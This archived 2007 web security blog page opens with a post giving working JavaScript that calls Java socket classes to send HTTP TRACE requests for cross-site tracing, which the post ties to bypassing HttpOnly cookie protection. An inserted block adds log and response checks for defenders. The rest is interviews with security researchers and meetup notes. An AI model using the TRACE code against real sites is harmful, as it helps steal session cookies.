Monday, April 30, 2007

Using Java from within the browser's JavaScript to exploit web application vulnerabilities, Part 1

Last weekend Jeremiah showed me a code snippet where he was able to run the TRACE method against a server using Java from JavaScript. It was a little slow, but it did the job. He asked me if there was a way to make it run faster. After some work with the JDK 1.4 API, I was able to get the job done a lot faster. I always knew that we could run Java from JavaScript, but it never crossed my mind that it could be used this way too. That is why people like Jeremiah are so far ahead in the game: they have the ability to think differently.

In his post XST lives! (Bypassing HttpOnly) he shows a proof of concept for exploiting vulnerabilities in web applications.

The explanation here is (for the most part) the same as in his blog post, except for a couple of extra points. But this exercise got me thinking, and I want to make this a running thread and come up with more ideas for using Java and JavaScript to figure out what else can be done.


Approach 1 (Traditional Approach using earlier versions of jdk)

Complete Code

// Host name taken from the page's own location
var l = document.location;
var host = l.host.toString();
var port = 80;
// getByName is a static method, so it is called without "new"
var addr = java.net.InetAddress.getByName(host);
var socket = new java.net.Socket(addr, port);
var wr = new java.io.BufferedWriter(new java.io.OutputStreamWriter(socket.getOutputStream(), "UTF8"));
var rd = new java.io.BufferedReader(new java.io.InputStreamReader(socket.getInputStream()));
// HTTP lines end in CRLF; Connection: close makes the server end the response,
// so the read loop below terminates instead of waiting on a kept-alive socket
wr.write("TRACE / HTTP/1.1\r\n");
wr.write("Host: " + host + "\r\n");
wr.write("Connection: close\r\n");
wr.write("\r\n");
wr.flush();
var lines = "";
var str;
while ((str = rd.readLine()) != null) {
    lines += str + "\n";
}
alert(lines);
wr.close();
rd.close();
socket.close();

Step by Step explanation of the code

1. Get the URL from the browser's address bar

var l = document.location;

2. Get the host name.

var host =l.host.toString();

3. Set the port to 80. We could also determine the port from the location bar.

var port = 80;

4. Get the IP address of the host given the host name. The host name can either be a machine name, such as "java.sun.com", or a textual representation of its IP address. If a literal IP address is supplied, only the validity of the address format is checked.

var addr = java.net.InetAddress.getByName(host);

5. java.net.Socket creates a stream socket and connects it to the specified port number at the specified IP address.

var socket = new java.net.Socket(addr,port);

6. Open an output stream to send the request data to the server.

var wr = new java.io.BufferedWriter(new java.io.OutputStreamWriter(socket.getOutputStream(), "UTF8"));

7. Open an input stream to read the response data from the server.

var rd = new java.io.BufferedReader(new java.io.InputStreamReader(socket.getInputStream()));

8. Send a TRACE request to the server. HTTP lines end in CRLF, and the Connection: close header makes the server close the connection after the response, so the read loop in step 10 ends.

wr.write("TRACE / HTTP/1.1\r\n");
wr.write("Host: " + host + "\r\n");
wr.write("Connection: close\r\n");
wr.write("\r\n");

9. Flush the output stream so that there is no data left in the buffer.

wr.flush();

10. Read the response from the server until readLine returns null, which means the response is complete.

var lines = "";
var str;
while ((str = rd.readLine()) != null) { lines += str + "\n"; }

11. Display the lines using the JavaScript alert function

alert(lines);

12. Close the input and output streams

wr.close();
rd.close();

13. Close the socket

socket.close();


Approach 2

In the traditional way (like the approach above), you ask for the socket's input and/or output streams. The newer approach uses channels, which are available in JDK 1.4 or newer. With a channel you write directly to the channel itself; rather than writing byte arrays, you read and write ByteBuffer objects. By default, a read returns at least one byte, or -1 to indicate the end of the data, exactly as an InputStream does, but it will often read more bytes when more are available.

Complete Code

var l = document.location;
var host = l.host.toString();
var port = 80;
var addr = java.net.InetAddress.getByName(host);

// The channel connects directly to host:port
var client = java.nio.channels.SocketChannel.open(new java.net.InetSocketAddress(host, port));
// CRLF line endings; the blank line ends the request and Connection: close ends the response
var line = "TRACE / HTTP/1.1\r\nHost: " + host + "\r\nConnection: close\r\n\r\n";
var s1 = new java.lang.String(line);

client.write(java.nio.ByteBuffer.wrap(s1.getBytes()));

var buffer = java.nio.ByteBuffer.allocate(8000);
client.read(buffer);
// Convert only the bytes actually read; the rest of the array is still zero
alert(new java.lang.String(buffer.array(), 0, buffer.position()));
client.close();



Step by step explanation

// Same as in the approach above
var l = document.location;
var host = l.host.toString();
var port = 80;
var addr = java.net.InetAddress.getByName(host);

1. Create a SocketChannel

var client = java.nio.channels.SocketChannel.open(new java.net.InetSocketAddress(host, port));

2. Build the request as a Java String object so that it can be converted to a byte array.

var line = "TRACE / HTTP/1.1\r\nHost: " + host + "\r\nConnection: close\r\n\r\n";
var s1 = new java.lang.String(line);

3. Wrap the data into a ByteBuffer object. Send the buffer to the server.

client.write(java.nio.ByteBuffer.wrap(s1.getBytes()));

4. Allocate a ByteBuffer object to read the data from the server. The advantage of using a ByteBuffer is that a single read fills it with as many bytes as are available, instead of reading one byte at a time.

var buffer = java.nio.ByteBuffer.allocate(8000);

5. Read the data from the server. If the response is larger than the allocated buffer, use the while loop shown below.

client.read(buffer);

6. Display the response using javascript alert function

alert(new java.lang.String(buffer.array(), 0, buffer.position()));

If there is more data than allocated (8000 bytes here), use the following loop instead. It keeps reading until the server closes the connection (read returns -1) and collects the whole response:

var lines = "";
while (client.read(buffer) != -1) {
    buffer.flip();                       // switch the buffer from filling to draining
    lines += new java.lang.String(buffer.array(), 0, buffer.limit());
    buffer.clear();                      // ready for the next read
}
alert(lines);


The difference between the two is speed: the first approach is slower than the second. The first approach, however, is more compatible across OSes, since it only needs classes present in earlier JDK versions, whereas the channel-based approach requires JDK 1.4 or newer and might not be available everywhere.
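As an added example (not code from the original post), the following JavaScript shows two checks a defender would run against this technique: flagging TRACE and TRACK requests in Apache combined-format access logs, and confirming from a raw TRACE response whether the server still echoes the Cookie header. The log lines and responses are constructed samples; the host name example.test and the session value are placeholders.

```javascript
// Added example, not from the original post: defender-side checks for
// cross-site tracing. All sample data below is constructed.

// Apache "combined" access log format. The method is the first token of the
// quoted request; the status is the first number after the closing quote.
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) (\S+)" (\d{3}) (\S+)/;

// Return every entry whose method is TRACE or TRACK (TRACK being the IIS
// variant that echoes the request the same way). Lines that do not match the
// format are skipped rather than thrown on, so a mixed log does not abort.
function findTraceProbes(lines) {
  const hits = [];
  for (const line of lines) {
    const m = LOG_RE.exec(line);
    if (!m) continue;
    const method = m[3].toUpperCase();
    if (method === 'TRACE' || method === 'TRACK') {
      hits.push({ client: m[1], time: m[2], method, path: m[4], status: Number(m[6]) });
    }
  }
  return hits;
}

// Split a raw HTTP/1.x response into status code, headers and body. CRLF is
// what the protocol requires, but bare LF is tolerated because the post's own
// requests mix the two and some servers answer in kind.
function parseHttpResponse(raw) {
  const sep = raw.includes('\r\n\r\n') ? '\r\n\r\n' : '\n\n';
  const idx = raw.indexOf(sep);
  const head = idx === -1 ? raw : raw.slice(0, idx);
  const body = idx === -1 ? '' : raw.slice(idx + sep.length);
  const lines = head.split(/\r?\n/);
  const status = Number(lines[0].split(' ')[1]) || 0;
  const headers = {};
  for (const l of lines.slice(1)) {
    const c = l.indexOf(':');
    if (c > 0) headers[l.slice(0, c).trim().toLowerCase()] = l.slice(c + 1).trim();
  }
  return { status, headers, body };
}

// True when TRACE succeeded (2xx) and the echoed request contains a Cookie
// header: exactly the condition under which TRACE hands HttpOnly cookies to
// script. Once the method is disabled the server answers 405 and this is false.
function traceEchoesCookies(raw) {
  const r = parseHttpResponse(raw);
  if (r.status < 200 || r.status >= 300) return false;
  return /^cookie:/im.test(r.body);
}

// Constructed access log: one normal request, one TRACE that was answered,
// one TRACK that was refused, and one malformed line.
const SAMPLE_LOG = [
  '203.0.113.7 - - [30/Apr/2007:10:15:02 -0700] "GET /index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [30/Apr/2007:10:15:03 -0700] "TRACE / HTTP/1.1" 200 471 "-" "Mozilla/5.0"',
  '198.51.100.4 - - [30/Apr/2007:10:16:11 -0700] "TRACK / HTTP/1.1" 405 0 "-" "Mozilla/4.0"',
  'not an access log line',
];

// Constructed TRACE responses: a server that echoes the request (vulnerable)
// and one where TRACE has been disabled (fixed). Host and cookie are placeholders.
const VULNERABLE_RESPONSE =
  'HTTP/1.1 200 OK\r\nContent-Type: message/http\r\n\r\n' +
  'TRACE / HTTP/1.1\r\nHost: example.test\r\nCookie: session=PLACEHOLDER\r\n\r\n';
const FIXED_RESPONSE = 'HTTP/1.1 405 Method Not Allowed\r\nAllow: GET, HEAD, POST\r\n\r\n';

// Stand-alone run: report what each check finds.
for (const p of findTraceProbes(SAMPLE_LOG)) {
  console.log(`${p.time} ${p.client} ${p.method} ${p.path} -> ${p.status}`);
}
console.log('vulnerable server echoes cookies:', traceEchoesCookies(VULNERABLE_RESPONSE));
console.log('fixed server echoes cookies:', traceEchoesCookies(FIXED_RESPONSE));
```

The log regex matches Apache's combined format only; adjust it for other servers' formats.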

I will publish other things soon which I found out while doing this exercise.

Reflection on Andrew Van Der Stock


This week on reflection we have Andrew Van der Stock. Andrew is very active in the webappsec industry through OWASP and is involved in a lot of activities, including the OWASP Top Ten and the OWASP Guide. He has contributed a lot to the webappsec field, more so in terms of research and awareness on securing applications rather than exploiting them. He used to be based in Australia and has recently moved to Columbia, MD, and joined Aspect Security. Today he shares with us his journey with web application security and his thoughts on black hat and white hat hackers (or should I say security professionals). In his own words:


”I started playing with computers when I was 7 on a Commodore Pet. My first attempts of squeezing more out of my computer than it probably was capable of was with my Amstrad 6128, which ran a Z80 at 4 MHz. I more than doubled the speed of the 3" (yes, 3") disk drive by driving it directly. This is where I had my first taste of assembly language and low level prodding and probing.

Back in the mid-1990s, I was a system administrator at an Australian hospital. Doctors would frequently try to dump private electronic patient (UR) records for their private use, possibly to sell to drug companies, but always illegal. This unregulated (at the time) but immoral use of our health data infuriated me and got me into ethics and privacy in a big way. This led me to join SAGE-AU, the System Administrator's Guild of Australia, eventually rising to be SAGE-AU's President.

I used to be the editor of SAGE Advice, the SAGE-AU journal, and I ended up writing about 20-30 articles for that. Most are system administration flavored, so not that useful to your readers.

I used to pen a weekly column for the Australian newspaper (a daily national broadsheet in Australia). I think I wrote about 30 odd articles for them back in the day, but their archives are closed to non-subscribers so I can't tell for sure. I lost a lot of data (we all learn once!) when I went from my early Macs to my SMP workstation running Windows NT 3.51, and I still don't have all my data from that time. Luckily, I'm back on a beautiful Mac again, and as I've learnt the hard lessons of data, I have everything dating back to 1995.

I was the author of most of the technical standards and policy set by auDA, the Australian Domain Name Administrator (similar in function to ICANN). I worked with two or three others for the majority of this project, although as always, we started with many more. My work on this panel regulates how DNS works in Australia.

I never completed my degree. If anyone from RMIT CS is reading, I wouldn't mind getting some credits for my work at OWASP so I can finish it up. Let's talk! If anyone else is interested in offering me a place in masters by research program in web app sec, I'd be interested. I don't think I'm really cut out for undergraduate course work, but I love doing ground breaking research.

I am a dual Microsoft MCSE. My first MCSE was NT 4.0 back in 1997, and then I got my Windows 2000 early adopter MCSE in late 1999 when they were trialing the exams. Early adopters got a nice Gold MCSE card! Many folks find this a bit funny, especially as I've been active in open source for so long... And that I'm really a Mac dude at heart. But I have a soft spot for Microsoft as they do the basic research in our field, and they own up to security flaws and fix them properly. Now, they're reaping the rewards. Good for them. Many vendors could learn a thing or ten from MS. I'm pretty sure my MCSEs are expired now.

In 1998, I entered the field properly as a security consultant. At that stage, finance institutions were starting to review the lockdown of apps. I was drafted into looking at various apps for many larger finance institutions, who were concerned with unmanaged risk and "mobile code" - ActiveX and Java applets running on their PCs. My interest grew from there, even though I didn't really start code reviewing stuff every day until the early part of this century.

In web app sec, I am completely self taught, but I did learn a lot from folks at OWASP – no one lives in a vacuum. I still do a lot of research using forum software to see how things can be fixed in the real world. I love working with some very smart folks who challenge me every day. It's a sad day when you don't learn or discover something new.

To understand this field, you must understand the threats and attacks to defend against them. I am reasonably certain anyone can learn how to attack if they Think Evil for long enough. It's far easier to Think Evil and destroy than it is to create solid software.

The proof of this putrid state of affairs is s'kid marks getting lots of unthinking column centimeters every day, and yet how little praise the folks in Microsoft got for their work on .NET 2.0. .NET 2.0 advances the field in so many ways – say by automatically rejecting any option in a select list which wasn't sent out in the first place. Whoever thought of that should be on the front page of CNET for a year to make up for the waste of space most "hacking" stories get. And there are so many more unsung heroes - master craftsmen (and women!) all. For every La Padula or Bell or Schneier, there's a thousand or more s'kid marks. This is a very asymmetrical situation and it's not good for our industry.

Criminals who attack systems are simply criminals, or in the abstract, attackers. Low level attackers are "s'kid marks" to me – morons who have a script who think they are the most l33t players. Unfortunately, a million s'kid marks equates to a lot of damage as eventually one or two will strike it lucky during school break.

The true hackers are folks like polymaths like Turing, von Neumann, Douglas Engelbart (the primary creator of the desktop metaphor back in the 1960s), Steve Wozniak (a true hardware hacker), the folks who made my HP 48G calculator (a work of art and mathematical tour de force!), and the recently deceased John Backus (the guy who created Fortran and is the "Backus" in BNF, used in every RFC grammar from here to eternity). Those folks are worthy of respect and are the true meaning of the word "hacker". But now, the word is lost forever because of constant misuse over a long period of time.

My thing is software engineering as a repeatable practice. We have to stop treating web app sec as a black art. We have to stop lauding the attackers and praising the folks who deliberately break software for nothing more than getting their name in lights. We have to stop thinking these folks are somewhat special. If you're a s'kid mark today, it's time to step up and move on. If you're any good, come join us on the light side of the force – before you commit a crime. There's so much to do and so much research begging for someone to just come and do it.

We should be celebrating the folks who put the hard yards into security research which protects us all – permanently. I'm trying to do this with CSRF at the moment, and will be taking some time this year to make PHP 6.0 safer. I know how to attack software and have done so, but I prefer to build strong software, so my skills lie in ensuring that the defenses and controls I write about, recommend, or indeed implement are robust against known attacks as well as the stuff over the horizon. Occasionally, I am at the horizon, such as when I went and played with JSON injection before pretty much anyone else. I don't claim to have invented JSON injection as it's so totally obvious anyone with half a clue could have recreated my work without any knowledge of what I was doing.

We need more folks who hang out at OWASP and WASC. We should have totally eliminated all forms of injection and other common weaknesses by now - and moved on to where the value lies – the business rules. It's a shame so many are sucked in by the dark side of our industry. It's such a waste of good talent.

I'm one of the dudes working on questions for SANS "National Secure Programming Skills Assessment", a soon to be forthcoming certification which will sort the wheat from the chaff. I'm doing the Java questions (eventually) and hope to be involved in the PHP questions when they kick that off. With some luck, this will not become a paper certification (where certified but clueless folks are rampant), but a suitable metric to prove skill.

I had a book contract to write an Ajax Security Book based upon my world famous Ajax Security Presentation from February last year. However, life intervened, and that's on permanent hold, especially as Billy Hoffman & co is writing what will be a superb Ajax Security book if his research is anything to go by.

I have the bones of a security architecture book waiting to go. If anyone feels like writing it with me, I should be free enough sometime in about two-five years :) Really should finish Guide 3.0 before starting this one though.

I've been involved in open source a long time. My first open source project, which I never completed (shame!) was GNU stty (gstty). Since then, I've been involved in XFree86 (from about 1996 onwards), Linux kernel when things didn't work on my SMP workstation (SMP was rare in the day), on the extreme periphery of NetBSD (my friend Luke was NetBSD core, so I wanted to show a little loyalty to his projects ;), pnm2ppa – print drivers for HP's worst ever printers for Unix/Linux/BSD.

Since 2001, I've been running Aussieveedubbers, a largish VW nut forum. Through that, I got into writing forums. Initially, I helped write XMB, which after a spat became UltimaBB, then GaiaBB, and possibly that code base will be re-forked back into XMB. UltimaBB is very secure compared to its contemporaries as I've been busy with it. However, like all projects using my infinite spare time... Things take a back seat to my real job and my real life.”

Below are his contributions to the webappsec community.

Articles:-

OWASP Guide 2.0 – as lead author and editor.
http://www.owasp.org/index.php/Guide_Table_of_Contents

OWASP Top 10 2007 (along with Dave Wichers and Jeff Williams).
http://www.owasp.org/index.php/Top_10_2007

Many web app sec blog articles:

http://www.greebo.net/?cat=3 (web app sec, 47 blog entries)
http://www.greebo.net/?cat=16 (OWASP, 24 blog entries)
http://www.greebo.net/?cat=17 (conferences and travel)


Memberships:-

Executive Director - OWASP
Columbia PHP user group
SAGE-AU 1995 - 2002, ex-President Jun 2000 – Mar 2001
AISA


Conferences:-

Andrew has presented at the following conferences:

SAGE-AU - The System Administrators Guild of Australia
OWASP – Open Web Application Security Project
Linux Australia
AusCERT – Australian Computer Emergency Response Team
RuxCon - Australian security conference, Vulnerability assessment and hacking information, for Australia
Black Hat – Black Hat
OSCON – Oreilly Open Source Convention


His favorite presentation is Ajax Security presentation. http://www.greebo.net/owasp/ajax_security.pdf

Predictable ISN numbers in Foundry ServerIron. My first bugtraq advisory back in 2000. So proud!
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0178


Tutored "Internet 101" back in the early 1990's at the Business Faculty at RMIT University


Tools written by him:-

WebSphere {xor} Secret Magic Ring Decoder Toy (C#)

XMB / UltimaBB / GaiaBB – forum software. It's a good test harness for new webappsec ideas. XMB 1.9.7 is due soon which fixes a lot of security issues. (PHP)


Companies worked for:-

Web Application Security jobs:

e-Secure – Senior Security Architect
b-sec – Chief Technologist
National Australia Bank – Security Application Architect
Aspect Security – Senior Engineer


Company working for:-

Aspect Security


Email:-

vanderaj__at__owasp__dot__org



Website:-

http://www.owasp.org


He has one of the sharpest brains in the industry. These contributions above do not reflect the amount of work he has done in promoting awareness in web application security.

Last Week – Nish Bhalla
Next Week – Bill Pennington

Monday, April 23, 2007

WASC Meetup - April 18 - pictures

Sorry for the delay in this post. Last Wednesday we had our WASC meetup in Sunnyvale. Unfortunately the date coincided with the OWASP San Francisco chapter meeting and some infosec conference in Toronto, so we did not get as much attendance as we expected, but still some of us showed up. Jeremiah had already mentioned on his blog that everyone has to buy a beer for someone they haven't met before. :)


Before you look at the pictures, I want to apologize for the quality, since they were taken with my cellphone.



From left to right -
Comcor - looking at people he hasn't met before, thinking how much beer he will have to buy.
Jeremiah (WhiteHat) - thinking "why am I so popular? Everyone knows me, so nobody will buy me a beer." Grrr
Brian Chess (Fortify Software) - laughing since there are a lot of people who will have to buy him a beer. He has no clue that he has to buy for them as well.


From left to right -
Joe (TiVo) - all smiles since he got his beer.
Robert Auger (WASC) - asking the guy to buy drinks since he has never met him before.
??? - He didn't tell me his name. Maybe he didn't want to buy me a drink.


Left - Comcor wondering "do I really need to buy others a drink?"
Right - Jeremiah (WhiteHat) smiling and enjoying his beer. Maybe he has a plan for someone to pay for it.




From left to right -

Cori (Google) - looking at Brian Chess (right) to buy him a beer
Jeremiah (WhiteHat) - ordering appetizers for us (it was very nice of him)
Brian Chess (Fortify Software) - probably scared; he doesn't want to buy Cori a beer

Left - Frederick Lee (Fortify Software) wondering "what did I do to deserve this?"
Right - Joe (TiVo) - probably thinking how to get Jeremiah to pay for everybody's beer. You can see the smile on his face.




From left to right -
Andy (PayPal), Robert Auger (WASC), Joe (TiVo)
Everybody happy since Jeremiah picked up the tab.


All jokes apart, it was fun getting to know people who are in the Bay Area, and hopefully we will do it again sometime in the next couple of months. This time we will make sure that it doesn't coincide with other events.

Special thanks to Jeremiah for bringing all of us together.

Reflection on Nish Bhalla


This week on reflection we have Nish Bhalla from Security Compass. Nish has been around the block for a long time and used to work for Foundstone before starting his own company. He is a specialist in product testing, code reviews, web application testing, and host and network reviews. He has presented at various conferences, published articles, and contributed to and co-authored several books. He gives lectures and webinars at Seneca College and Florida University and has also been quoted in Government Security News, InternetNews and CSO Online.
He has tremendous knowledge in the webappsec space and has been involved with OWASP and YASSP. Below is his journey in the WebAppSec space in his own words:

“I've been interested in security since the mid-90s, pretty much right after I was exposed to UNIX. I started off by developing client/server apps around the same time and tried to hack them. Security knowledge was still considered underground hacker knowledge then and not a whole lot of information was publicly disseminated. I had the opportunity to meet with a few interesting virus writers back at school who taught me a few things about reverse engineering and Clipper, the old reversing software (not the Clipper programming language).

I started learning about web technologies in the late 90s when I was involved in performing host audits and building secure web servers. I had the opportunity to be involved with the rollout of an online trading company's web application. This was the time where I started getting a good understanding of web applications and how they interact with various components. I took care to understand the technologies and their underlying protocols during this time.

During the same time (in late 90's) I had the opportunity to work for Foundstone. An amazing team of security consultants taught me some new tricks on hacking web applications. I had already learnt a lot about web security when I was involved with the rollout but what these consultants taught me was to adopt a different mind set - the attacker's mind set.

The ease of exploiting of Web Applications was what got me so involved in web app sec (unlike writing buffer overflows which requires a lot more low level knowledge and skills). The code behind the various web application vulnerabilities caught my interest more than just the vulnerabilities themselves.

In 2004, after leaving Foundstone, I started Security Compass, which is where I am today. We decided to develop a RATS-like web code auditing tool, SWAAT (Security Compass Web Application Analysis Tool), to help with doing some basic server page code auditing.

We're currently involved in doing some interesting research on web services and we'll be coming out with interesting web services tools in the near future.

I'm a big snooker/pool fan; living in Toronto provides me with the chance to meet a lot of interesting people.”


Based out of Toronto, CA, Nish is 33 years old. Below are his contributions to the community.


Articles:-

Writing Stack Based Overflows on Windows
http://www.securitycompass.com/resources/StackBasedOverflows-Windows-Part1.pdf
http://www.securitycompass.com/resources/StackBasedOverflows-Windows-Part2.pdf
http://www.securitycompass.com/resources/StackBasedOverflows-Windows-Part3.pdf
http://www.securitycompass.com/resources/StackBasedOverflows-Windows-Part4.pdf

AIX 4.3 Bastion Host Guidelines
http://www.giac.org/certified_professionals/practicals/gsec/0853.php

Building Secure Applications: Consistent Logging
http://www.securityfocus.com/infocus/1888

IIS Lockdown and Urlscan
http://www.securityfocus.com/infocus/1755


Books:-

Co-authored

Buffer Overflow Attacks
http://www.amazon.com/gp/product/1932266674/


Contributed

Hacking Exposed Web Applications, Second Edition
http://www.amazon.com/gp/product/0072262990

HackNotes(tm) Network Security Portable Reference
http://www.amazon.com/gp/product/0072227834/

Windows(R) XP Professional Security
http://www.amazon.com/gp/product/0072226021/

Writing Security Tools and Exploits
http://www.amazon.com/gp/product/1597499978


Conferences:-

Web Service Vulnerabilities
http://www.blackhat.com/html/bh-europe-07/bh-eu-07-index.html

Application Security - Dallascon
http://www.dallascon.com/

Federations of Security Professionals
http://www.fspgroup.ca/

Binary Analysis, Finding Secret in ISAPIs - 2006
http://www.syscan.org/

Preparing for a FISMA Compliancy Audit: What IT Security Professional Needs to Know
http://www.infosecurityevent.com/App/homepage.cfm?moduleid=42&appname=100004

Finding Secrets in ISAPI
http://conference.hackinthebox.org/hitbsecconf2006kl/

Auditing Source Code
http://2005.recon.cx/


Other Contributions:-

OWASP Toronto Local Chapter
http://www.owasp.org/index.php/Toronto

SWAAT
http://www.owasp.org/index.php/Category:OWASP_SWAAT_Project

Yet Another Solaris Security Project
http://www.yassp.org/yassp/


Company working for:-

Security Compass


Email:-

nish__at__securitycompass_dot_com


Website:-

www.securitycompass.com


Companies worked for:-


Foundstone, Infotek Solutions


Education:-

Masters in Parallel Processing from Sheffield University,
Post graduation in Finance from Strathclyde University,
Bachelor in Commerce from Bangalore University



Nish is currently working on some very interesting tools and hopefully will be released soon which are definitely worth evaluating.

Last Week – Ory Segal
Next Week – Andrew Van Der Stock

Monday, April 16, 2007

Reflection on Ory Segal


This week on reflection we have Ory Segal of Watchfire. Ory has been involved in webappsec from its very early days. He has published several whitepapers, articles and advisories. He has contributed to security standards like the WASC Threat Classification and the WASC Firewall Evaluation Criteria. He has spoken at various conferences and security events and is highly regarded among web application security professionals. Today, he shares with us his journey in the web application security field. In his own words:

“My involvement in the security world started back in 1995, when I was hired as a technician for a company that dealt with counter-intelligence. The job was very interesting and included all sorts of things you only see in movies – scanning and locating eavesdropping equipment, installing all sorts of intelligence gadgets for government agencies, etc. (during that time I developed paranoia, and to this day I always search new places I visit for hidden security cams).

When I grew tired of counter-intelligence I made the switch over to the Internet which was just emerging here in Israel. I worked for about a year for one of Israel’s biggest ISPs, and I learned all about network security - specifically TCP/IP and Linux. Someone I knew (and who knew what I was doing in my spare time) who worked for a large data security consulting company in Israel asked me to help her build a penetration testing team, which sounded very interesting to me. I then spent almost two years building a team of penetration testers that performed risk assessments for almost every major company in Israel, as well as most of the government offices. As a part of my job, I was managing several large-scale and critical information security projects for clients such as the Tel Aviv Stock Exchange, Israeli banks and the Israeli Department of Defense.

On one of the projects I was managing, I was introduced to a very interesting piece of software, which at the time was quite innovative – a Web Application Firewall. It was called Clearnet, and was developed by a small company called Perfecto Technologies. The product would later become AppShield, and the company would later become Sanctum Inc. AppShield was such an interesting and refreshing idea that it got me very intrigued. As part of my role I got the chance to try and hack my way through AppShield which was very hard. I did find some minor issues, but never got through… that’s when I really got hooked on web application security. Unlike network-level hacking, which almost always summed up to exploiting some buffer overflow, web application hacking posed a lot more challenges. It was all about bypassing application logic and felt like solving a puzzle.

After a few months I received an offer from Gili Raanan (co-founder of Sanctum) who was in the process of putting together a team of security researchers. During my interview I was introduced to the soon-to-be-famous Amit Klein. Lucky for me, Amit decided to hire me. In the end, working with Amit is one of my fondest memories of my years with Sanctum. Amit is a great mentor and I could not have hoped for a better boss, and friend.

My work at Sanctum revolved mostly around AppScan - a new product the company was just building. It was the first automated web application scanner in the world. When I started working on the product, it was just at v1.0, and was built around an HTTP Proxy. It worked by proxying and analyzing HTTP traffic that was created by the user who manually browsed through the application, and by creating some simple parameter tampering attacks. At that time it did not include the sophisticated capabilities that we have all come to expect from AppScan.

As well as performing lots of web application security audits and researching and publishing vulnerabilities, I was also responsible for writing parts of AppScan’s attack engine, creating and maintaining thousands of attacks for the product’s test database. At the time, one of the biggest challenges for web application scanners was how to automate the process of testing and validating web security issues - our group pioneered this field.

When I first started working for Sanctum in 2000, web application security was in its infancy – we had to educate the market. It was challenging but very fulfilling. Sanctum created this market space and I was thrilled to be a part of something I knew would only grow in importance. I remember how people who attended presentations I gave looked at me, and how their jaws dropped when I would demonstrate simple things like Shopping-Cart manipulations or SQL Injection. Big pieces of the WebAppSec puzzle were still missing – XSS, Blind SQL Injection, and many other techniques were either not yet known publicly, or known but not taken very seriously. In fact, as you probably know, XSS was disregarded by many during the first years after it was discovered – people didn’t take it seriously for a long time.

In 2004 Watchfire acquired Sanctum and I took the role of AppShield Product Manager and helped the company successfully transition AppShield to F5.

In 2005 I accepted the role of Director of Security Research for Watchfire and since then I have been a part of the Product Management Group. In this role I am responsible for helping to improve AppScan and to continually find ways to automate more aspects of the web application security assessment process. In addition, I am also researching new technologies and directions for Watchfire’s products as well as overseeing the security research which is now performed by a much larger team of security experts (who recently published the “Overtaking Google Desktop” whitepaper).

I am very excited about the direction that AppScan and automated scanning has taken in recent years, and I am sure we’ll see some major improvements and interesting new technologies in the near future. I am also very happy to see that more and more organizations are taking WebAppSec seriously, the market has come a long way.

In the “old days”, we did publish some *nasty* anonymous security advisories. It was fun, but I can’t disclose any more information. Now I am a strong supporter of proper disclosure policies (go RFPolicy!)

Back in 2002, I co-founded a small local group of security experts called 8200.org (it was a takeoff on the whole 2600.org, and 8200 – an Israeli intelligence army unit, which spawned some of the greatest minds in the security industry). We ran several projects, one of which was the first WarDriving experiment in Israel. The results were obvious and we got some publicity in local newspapers. Among others, the group included Liraz Siri (who performed the Internet Auditing Project and scanned 36 million servers across the internet).

I am a musician, I mainly play guitar. I have been a part of the Tel Aviv Indie Rock scene since 1997. In 1997 I put out a solo record (where I played all instruments), under the pseudonym “Wilkesboro Brothers”, since then I have been involved in several bands. My current band is called Pits (http://www.myspace.com/pitzmusic), we put out an album in 2005, which got good reviews and we are currently working on our second album. If you happen to be in Tel-Aviv, check out our gig schedule.

I live with my wife Orli, who is also involved in the IT Security market (Orli worked many years for Check Point, and also co-founded another security start-up). It’s not uncommon to hear us talk about security stuff at home. We are both techies and also fanatic music lovers.”




Based out of Tel Aviv, Israel, Ory is only 33 years old. Below is a list of his contributions to the community.


Articles:-

Testing Privilege Escalation in Web Applications:
https://www.watchfire.com/securearea/whitepapers.aspx?id=24

Web Application Forensics: The uncharted territory:
http://www.cgisecurity.com/lib/WhitePaper_Forensics.pdf

Methodologies & Tools for Web Application Security Assessment:
https://www.watchfire.com/securearea/whitepapers.aspx?id=20

Ory has also authored a series of webcasts on the WASC TC (Threat Classification) project, covering web application security, has taught advanced hacking courses, and has given numerous presentations around the globe on the subject of web application security. Links to those can be found on the Watchfire website (registration with personal information is required).



Advisories:-

Apache Win32 Batch File Remote Command Execution Vulnerability:
http://www.securityfocus.com/bid/4335

Multiple vendors web server source code disclosure - 8.3 name format vulnerability:
http://www.securityfocus.com/archive/1/273308

Macromedia ColdFusion MX Missing Template Cross Site Scripting Vulnerability:
http://www.securityfocus.com/bid/5011/

Microsoft Exchange Server 5.5 Outlook Web Access Cross-Site Scripting Vulnerability:
http://www.securityfocus.com/bid/8832

Multiple XSS vulnerabilities in Microsoft SharePoint Portal Server:
http://www.securityfocus.com/bid/10043

Cpanel Admin Interface HTML Injection Vulnerability:
http://www.securityfocus.com/bid/8119

Microsoft IIS 5.x/6.0 WebDAV (XML parser) attribute blowup DoS (written by Amit Klein; Ory helped apply the vulnerability to Microsoft IIS servers):
http://www.securityfocus.com/archive/1/378179

PhpBB HTTP Response Splitting & Cross Site Scripting vulnerabilities:
http://www.securityfocus.com/bid/10753 &
http://www.securityfocus.com/bid/1074

Deerfield VisNetic WebSite Cross Site Scripting Vulnerability:
http://www.securityfocus.com/bid/6369


Tools:-

Ory has long been actively developing parts of Watchfire AppScan and the PowerTools; other than those, most of his tools are used only internally at Watchfire.


Contributions:-

MITRE CWE project
http://cwe.mitre.org/

WAFEC
http://www.webappsec.org/projects/wafec/

WASC Threat Classification
http://www.webappsec.org/projects/threat/



Memberships:-

Web Application Security Consortium


Blog:-

http://blog.watchfire.com


Education:-

BA in Computer Science from the Open Univ. of Israel.


Companies worked for:-

YTS Security Systems, Internet Gold, Avnet Data Security, Sanctum, Watchfire


Company working for:-

Watchfire


Email:-

osegal at watchfire dot com


Ory Segal is one of the most respected figures in web application security. I hope he starts his blog soon, so that he can share his ideas and thoughts with us more frequently.
Last Week - Chris Shiflett
Next Week – Nish Bhalla

Tuesday, April 10, 2007

WASC Meetup in bay area

It's a beerfest, guys. Put it on your calendar.

Normally we hold WASC Meet-Ups during large conferences (RSA/BlackHat), where a lot of web application security people are in the same place at the same time. Around the S.F. Bay Area there are enough webappsec people that we no longer need that excuse. So we're going to plan a WASC Meet-Up and invite those in the local community to drop by. It'll be an informal event, maybe 15-30 people, with no presentations or sponsors: just like-minded people sharing food, drinks, and interesting conversation. Simply an opportunity to see people we otherwise only communicate with virtually. Everyone is welcome. Please RSVP to Jeremiah if you plan on coming.

RSVP - contact__at__webappsec_dot_org

